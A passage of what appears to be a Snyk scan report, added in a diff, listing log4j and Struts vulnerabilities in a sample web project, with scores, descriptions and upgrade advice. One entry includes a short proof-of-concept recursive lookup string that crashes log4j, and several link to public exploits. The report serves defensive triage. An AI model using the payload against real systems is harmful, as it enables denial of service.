[CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n", + "epssDetails": { + "percentile": "0.99913", + "probability": "0.97364", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-45046" + ], + "CWE": [ + "CWE-94" + ], + "GHSA": [ + "GHSA-7rjr-3q55-vv33" + ] + }, + "packageName": "org.apache.logging.log4j:log4j-core", + "proprietary": false, + "creationTime": "2021-12-14T18:28:31.339218Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2021-12-14T18:01:28Z", + "exploitDetails": { + "sources": [ + "CISA", + "Nuclei Templates", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Attacked", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.logging.log4j", + "artifactId": "log4j-core" + }, + "publicationTime": "2021-12-14T18:44:00Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:25.837600Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.logging.log4j:log4j-core@2.7" + ], + "upgradePath": [ + false, + "org.apache.logging.log4j:log4j-core@2.12.2" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.logging.log4j:log4j-core", + "version": "2.7" + }, + { + "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2321524", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", + "credit": [ + "Hideki Okamoto of Akamai Technologies" + ], + "semver": { + "vulnerable": [ + "[2.0-beta9,2.3.1)", + "[2.4,2.12.3)", + "[2.13.0,2.17.0)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.3.1", + "2.12.3", + "2.17.0" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.logging.log4j:log4j-core", + "references": [ + { + "url": "https://logging.apache.org/log4j/2.x/security.html", + "title": "Apache Security" + }, + { + "url": "https://issues.apache.org/jira/browse/LOG4J2-3230", + "title": "JIRA Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 5.9, + "modificationTime": "2024-03-11T09:51:51.570474Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 5.9, + "modificationTime": "2024-03-11T09:53:58.516498Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:38.288854Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:51.570474Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:58.516498Z" + } + ], + "description": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). Does not protect against uncontrolled recursion from self-referential lookups. \r\n\r\nWhen the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, `$${ctx:loginId}`), attackers with control over Thread Context Map (MDC) input data can craft malicious input data that contains a recursive lookup, resulting in a `StackOverflowError` that will terminate the process.\r\n\r\n### PoC\r\n\r\nIn `log4j.properties`:\r\n```java\r\nappender.console.type = Console\r\nappender.console.name = console\r\nappender.console.layout.type = PatternLayout\r\nappender.console.layout.pattern = !${ctx:test}! %m%n\r\nrootLogger.level = ALL\r\nrootLogger.appenderRef.file.ref = console\r\n```\r\n\r\nIn `Main.java`:\r\n```java\r\nThreadContext.put(\"test\", \"${::-${ctx:test}}\");\r\nlogger.error(\"boom\"); // Will not be logged\r\n```\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.1, 2.12.3, 2.17.0 or higher.\n## References\n- [Apache Security](https://logging.apache.org/log4j/2.x/security.html)\n- [JIRA Issue](https://issues.apache.org/jira/browse/LOG4J2-3230)\n", + "epssDetails": { + "percentile": "0.99624", + "probability": "0.96524", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-45105" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "org.apache.logging.log4j:log4j-core", + "proprietary": false, + "creationTime": "2021-12-17T18:23:58.542986Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2021-12-17T18:20:21Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.logging.log4j", + "artifactId": "log4j-core" + }, + "publicationTime": "2021-12-18T07:05:00Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:58.516498Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.logging.log4j:log4j-core@2.7" + ], + "upgradePath": [ + false, + "org.apache.logging.log4j:log4j-core@2.12.3" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.logging.log4j:log4j-core", + "version": "2.7" + }, + { + "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2327339", + "title": "Arbitrary Code Execution", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H/E:P", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0-beta7,2.3.2)", + "[2.4,2.12.4)", + "[2.13.0,2.17.1)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.3.2", + "2.12.4", + "2.17.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 6.6, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.logging.log4j:log4j-core", + "references": [ + { + "url": "https://logging.apache.org/log4j/2.x/security.html", + "title": "Apache Security Page" + }, + { + "url": "https://github.com/apache/logging-log4j2/commit/05db5f9527254632b59aed2a1d78a32c5ab74f16", + "title": "GitHub Commit" + }, + { + "url": "https://issues.apache.org/jira/browse/LOG4J2-3293", + "title": "Jira Issue" + }, + { + "url": "https://www.openwall.com/lists/oss-security/2021/12/28/1", + "title": "Openwall Mail" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 6.6, + "modificationTime": "2024-03-11T09:48:51.766965Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 6.6, + "modificationTime": "2024-03-11T09:53:58.472982Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H/E:P", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 6.6, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:04:47.220633Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.6, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:51.766965Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 6.6, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:58.472982Z" + } + ], + "description": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution.
**Note:** Even though this vulnerability appears to be related to the [log4Shell vulnerability](https://security.snyk.io/vuln/SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2314720), this vulnerability requires an attacker to have access to modify configurations to be exploitable, which is rarely possible.\r\n\r\nAn attacker with access to modification of logging configuration is able to configure `JDBCAppender` with a data source referencing a JNDI URI - which can execute malicious code.\r\n\r\nIn the fixed versions, `JDBCAppender` is using `JndiManager` and disables JNDI lookups by default (via `log4j2.enableJndiJdbc=false`).\r\n\r\n## Alternative Remediation\r\nIf you have reason to believe your application may be vulnerable and upgrading is not an option, you can either:\r\n\r\n* Disable/remove `JDBCAppender`\r\n* If `JDBCAppender` is used, make sure that it is not configured to use any protocol other than Java\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.2, 2.12.4, 2.17.1 or higher.\n## References\n- [Apache Security Page](https://logging.apache.org/log4j/2.x/security.html)\n- [GitHub Commit](https://github.com/apache/logging-log4j2/commit/05db5f9527254632b59aed2a1d78a32c5ab74f16)\n- [Jira Issue](https://issues.apache.org/jira/browse/LOG4J2-3293)\n- [Openwall Mail](https://www.openwall.com/lists/oss-security/2021/12/28/1)\n", + "epssDetails": { + "percentile": "0.89602", + "probability": "0.02239", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-44832" + ], + "CWE": [ + "CWE-94" + ] + }, + "packageName": "org.apache.logging.log4j:log4j-core", + "proprietary": false, + "creationTime": "2021-12-28T19:42:55.818691Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2021-12-28T19:42:53Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.logging.log4j", + "artifactId": "log4j-core" + }, + "publicationTime": "2021-12-28T20:17:52Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:58.472982Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.logging.log4j:log4j-core@2.7" + ], + "upgradePath": [ + false, + "org.apache.logging.log4j:log4j-core@2.12.4" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.logging.log4j:log4j-core", + "version": "2.7" + }, + { + "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-31409", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F", + "credit": [ + "Marcio Almeida de Macedo" + ], + "semver": { + "vulnerable": [ + "[,2.8.2)" + ] + }, + "exploit": "Functional", + "fixedIn": [ + "2.8.2" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [ + { + "version": [ + "[,2.8.2)" + ], + "functionId": { + "filePath": "org/apache/logging/log4j/core/net/server/TcpSocketServer.java", + "className": "TcpSocketServer", + "functionName": "createSerializedSocketServer" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.logging.log4j:log4j-core", + "references": [ + { + "url": "https://github.com/pimps/CVE-2017-5645", + "title": "Exploit" + }, + { + "url": "https://github.com/apache/logging-log4j2/commit/5dcc19215827db29c993d0305ee2b0d8dd05939d", + "title": "GitHub Commit" + }, + { + "url": "https://issues.apache.org/jira/browse/LOG4J2-1863", + "title": "Jira Issue" + }, + { + "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-5645", + "title": "NVD" + }, + { + "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/network/cves/2017/CVE-2017-5645.yaml", + "title": "Nuclei Templates" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:27.296331Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.838012Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:08.335550Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:27.296331Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.838012Z" + } + ], + "description": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. When using the TCP socket server or UDP socket server to receive serialized log events from another application, a specially crafted binary payload can be sent that, when deserialized, can execute arbitrary code.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.8.2 or higher.\n## References\n- [Exploit](https://github.com/pimps/CVE-2017-5645)\n- [GitHub Commit](https://github.com/apache/logging-log4j2/commit/5dcc19215827db29c993d0305ee2b0d8dd05939d)\n- [Jira Issue](https://issues.apache.org/jira/browse/LOG4J2-1863)\n- [NVD](https://nvd.nist.gov/vuln/detail/CVE-2017-5645)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/network/cves/2017/CVE-2017-5645.yaml)\n", + "epssDetails": { + "percentile": "0.98601", + "probability": "0.87384", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2017-5645" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-fxph-q3j8-mv87" + ] + }, + "packageName": "org.apache.logging.log4j:log4j-core", + "proprietary": false, + "creationTime": "2017-05-17T12:10:22.545000Z", + "functions_new": [ + { + "version": [ + "[,2.8.2)" + ], + "functionId": { + "className": "org.apache.logging.log4j.core.net.server.TcpSocketServer", + "functionName": "createSerializedSocketServer" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2017-04-01T21:00:00Z", + "exploitDetails": { + "sources": [ + "Nuclei Templates", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Functional", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.logging.log4j", + "artifactId": "log4j-core" + }, + "publicationTime": "2017-05-21T07:52:37Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:27.233939Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.logging.log4j:log4j-core@2.7" + ], + "upgradePath": [ + false, + "org.apache.logging.log4j:log4j-core@2.8.2" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.logging.log4j:log4j-core", + "version": "2.7" + }, + { + "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-567761", + "title": "Man-in-the-Middle (MitM)", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.13.2)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.13.2" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "low", + "cvssScore": 3.7, + "functions": [ + { + "version": [ + "[2.6,2.13.2)" + ], + "functionId": { + "filePath": "org/apache/logging/log4j/core/net/SmtpManager.java", + "className": "SmtpManager", + "functionName": "getSmtpManager" + } + }, + { + "version": [ + "[2.0-rc2,2.5)" + ], + "functionId": { + "filePath": "org/apache/logging/log4j/core/net/SmtpManager.java", + "className": "SmtpManager", + "functionName": "getSMTPManager" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.logging.log4j:log4j-core", + "references": [ + { + "url": "https://confluence.atlassian.com/jirakb/list-of-security-vulnerabilities-addressed-in-atlassian-log4j1-1141965553.html", + "title": "Atlassian Patch" + }, + { + "url": "https://github.com/apache/logging-log4j2/commit/6851b5083ef9610bae320bf07e1f24d2aa08851b", + "title": "GitHub Commit" + }, + { + "url": "https://issues.apache.org/jira/browse/LOG4J2-2819", + "title": "Jira Issue" + }, + { + "url": "https://github.com/qos-ch/reload4j/commit/90bc7826c206c256ee9ec6b51318cc1865cc19e9", + "title": "Reload4j Fix Commit" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "low", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", + "cvssV3BaseScore": 3.7, + "modificationTime": "2024-03-11T09:51:18.869400Z" + }, + { + "assigner": "Red Hat", + "severity": "low", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", + "cvssV3BaseScore": 3.7, + "modificationTime": "2024-03-11T09:53:58.100685Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", + "assigner": "Snyk", + "severity": "low", + "baseScore": 3.7, + "cvssVersion": "3.1", + "modificationTime": "2024-03-14T11:19:13.272608Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", + "assigner": "NVD", + "severity": "low", + "baseScore": 3.7, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:18.869400Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", + "assigner": "Red Hat", + "severity": "low", + "baseScore": 3.7, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:58.100685Z" + } + ], + "description": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Man-in-the-Middle (MitM). Improper validation of certificate with host mismatch in Apache Log4j SMTP appender. This could allow an SMTPS connection to be intercepted by a man-in-the-middle attack which could leak any log messages sent through that appender.\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.13.2 or higher.\n## References\n- [Atlassian Patch](https://confluence.atlassian.com/jirakb/list-of-security-vulnerabilities-addressed-in-atlassian-log4j1-1141965553.html)\n- [GitHub Commit](https://github.com/apache/logging-log4j2/commit/6851b5083ef9610bae320bf07e1f24d2aa08851b)\n- [Jira Issue](https://issues.apache.org/jira/browse/LOG4J2-2819)\n- [Reload4j Fix Commit](https://github.com/qos-ch/reload4j/commit/90bc7826c206c256ee9ec6b51318cc1865cc19e9)\n", + "epssDetails": { + "percentile": "0.56903", + "probability": "0.00191", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-9488" + ], + "CWE": [ + "CWE-297" + ], + "GHSA": [ + "GHSA-vwqq-5vrc-xw9h" + ] + }, + "packageName": "org.apache.logging.log4j:log4j-core", + "proprietary": false, + "creationTime": "2020-04-28T15:10:06.231410Z", + "functions_new": [ + { + "version": [ + "[2.6,2.13.2)" + ], + "functionId": { + "className": "org.apache.logging.log4j.core.net.SmtpManager", + "functionName": "getSmtpManager" + } + }, + { + "version": [ + "[2.0-rc2,2.5)" + ], + "functionId": { + "className": "org.apache.logging.log4j.core.net.SmtpManager", + "functionName": "getSMTPManager" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-04-27T17:16:14Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.logging.log4j", + "artifactId": "log4j-core" + }, + "publicationTime": "2020-04-28T17:16:14Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-14T11:19:13.272608Z", + "socialTrendAlert": false, + "severityWithCritical": "low", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.logging.log4j:log4j-core@2.7" + ], + "upgradePath": [ + false, + "org.apache.logging.log4j:log4j-core@2.13.2" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.logging.log4j:log4j-core", + "version": "2.7" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-1049003", + "title": "Remote Code Execution (RCE)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", + "credit": [ + "Alvaro Munoz", + "Masato Anzai" + ], + "semver": { + "vulnerable": [ + "[2.0.0, 2.5.26)" + ] + }, + "exploit": "High", + "fixedIn": [ + "2.5.26" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://cwiki.apache.org/confluence/display/WW/S2-061", + "title": "Apache Security Advisory" + }, + { + "url": "https://github.com/apache/struts/commit/45667346629455f7ea125bff36bf9b763b7e8463", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/phil-fly/CVE-2020-17530", + "title": "PoC" + }, + { + "url": "https://videos.hacking.land/2021/03/apache-struts-vulnerability-cve-2020.html", + "title": "PoC" + }, + { + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", + "title": "CISA - Known Exploited Vulnerabilities" + }, + { + "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2020/CVE-2020-17530.yaml", + "title": "Nuclei Templates" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:50:37.704300Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:04:56.396718Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:37.704300Z" + } + ], + "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE). The vulnerability exists due to improper input validation when processing certain tag's attributes. The application performs double evaluation of the code if a developer applied forced OGNL evaluation by using the `%{...}` syntax. A remote attacker can send a specially crafted request to the application and execute arbitrary code on the target system.\r\n\r\nSuccessful exploitation of this vulnerability may result in complete compromise of vulnerable system.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.5.26 or higher.\n## References\n- [Apache Security Advisory](https://cwiki.apache.org/confluence/display/WW/S2-061)\n- [GitHub Commit](https://github.com/apache/struts/commit/45667346629455f7ea125bff36bf9b763b7e8463)\n- [PoC](https://github.com/phil-fly/CVE-2020-17530)\n- [PoC](https://videos.hacking.land/2021/03/apache-struts-vulnerability-cve-2020.html)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2020/CVE-2020-17530.yaml)\n", + "epssDetails": { + "percentile": "0.99845", + "probability": "0.97257", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-17530" + ], + "CWE": [ + "CWE-94" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2020-12-08T19:30:16.810323Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2020-12-08T19:25:45Z", + "exploitDetails": { + "sources": [ + "CISA", + "Nuclei Templates", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Attacked", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2020-12-08T19:25:43Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:26.269995Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.5.26" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-2635340", + "title": "Remote Code Execution (RCE)", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P", + "credit": [ + "Chris McCown" + ], + "semver": { + "vulnerable": [ + "[2.0.0,2.5.30)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.5.30" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": 